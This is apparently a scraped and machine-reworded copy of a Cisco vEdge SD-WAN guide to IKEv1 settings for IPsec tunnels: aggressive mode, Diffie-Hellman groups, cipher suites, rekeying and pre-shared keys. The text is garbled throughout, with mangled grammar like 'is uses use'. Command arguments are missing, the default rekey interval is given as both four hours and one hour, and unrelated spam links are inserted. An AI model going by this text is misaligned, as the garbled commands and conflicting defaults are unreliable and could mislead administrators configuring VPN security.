Document
Security Configuration Guide for vEdge Routers, Cisco SD-WAN Release 20

Security Configuration Guide for vEdge Routers, Cisco SD-WAN Release 20

When you create an IPsec tunnel on a vEdge router, IKE Version 1 is enabled by default on the tunnel interface. The following

Related articles

Ways to Get Every Fruit for Free in Blox Fruits Atomic orbital Install app on macOS Download SuperVPN Free VPN Client on PC with MEmu Avis sur Astrill VPN (2024) : son prix élevé est-il vraiment justifié ?

When you create an IPsec tunnel on a vEdge router, IKE Version 1 is enabled by default on the tunnel interface. The following
properties are also enabled by default for IKEv1:

  • authentication and encryption — AES-256 advanced encryption standard CBC encryption with the HMAC – SHA1 key – hash message authentication
    code algorithm for integrity

  • Diffie-Hellman group number—16

  • Rekeying time interval—4 hours

  • SA establishment mode—Main

By default , IKEv1 is uses use IKE main mode to establish IKE SAs . In this mode , six negotiation packet are exchange to establish
the SA . To exchange only three negotiation packet , enable aggressive mode :

note


IKE aggressive mode with pre-shared keys should be avoided wherever possible. Otherwise a strong pre-shared key should be
chosen.


vedge(config ) #vpn  interface ipsec  ike
vEdge(config-ike)# mode aggressive 

By default , IKEv1 is uses use Diffie – Hellman group 16 in the IKE key exchange . This group is uses use the 4096 – bit more modular exponential
( MODP ) group during IKE key exchange . You is change can change the group number to 2 ( for 1024 – bit MODP ) , 14 ( 2048 – bit MODP ) , or 15
( 3072 – bit MODP ):

vedge(config ) #vpn  interface ipsec  ike
vEdge(config-ike)# group 

By default, IKE key exchange uses AES-256 advanced encryption standard CBC encryption with the HMAC-SHA1 keyed-hash message
authentication code algorithm for integrity. You can change the authentication:

vedge(config ) #vpn  interface ipsec  ike 
vEdge(config-ike)# cipher - suite 

The authentication can be one of the following:

  • aes128 – cbc – sha1—AES-128 advanced encryption standard CBC encryption with the HMAC-SHA1 keyed-hash message authentication code algorithm for
    integrity

  • aes128-cbc-sha2— aes-128 advanced encryption standard CBC encryption with the HMAC – SHA256 key – hash message authentication code algorithm
    for integrity

  • aes256-cbc-sha1—AES-256 advanced encryption standard CBC encryption with the HMAC-SHA1 keyed-hash message authentication code algorithm for
    integrity; this is the default.

  • aes256-cbc-sha2—AES-256 advanced encryption standard CBC encryption with the HMAC-SHA256 keyed-hash message authentication code algorithm
    for integrity

By default, IKE keys are refreshed every 1 hours (3600 seconds). You can change the rekeying interval to a value from 30 seconds
through 14 days (1209600 seconds). It is recommended that the rekeying interval be at least 1 hour.

vedge(config ) #vpn  interface ipsec  ike
vEdge(config-ike)# rekey 

To force the generation of new key for an IKE session , issue therequest ipsec ike – rekey command.

vedge(config ) #vpn  interfaceipsec  ike 

For IKE, you can also configure preshared key (PSK) authentication:

vedge(config ) #vpn  interface ipsec  ike
vEdge(config-ike)# authentication-type pre-shared-key pre-shared-secret 

is the password to use with the preshared key. It can be an ASCII or a hexadecimal string from 1 through 127 characters long.

If the remote IKE peer requires a local or remote ID, you can configure this identifier:

vedge(config ) #vpn  interface ipsec  ike authentication-type
 vedge(config - authentication - type ) #local - id 
 vedge(config - authentication - type ) #remote-id 

The identifier can be an IP address or any text string from 1 through 63 characters long. By default, the local ID is the
tunnel’s source IP address and the remote ID is the tunnel’s destination IP address.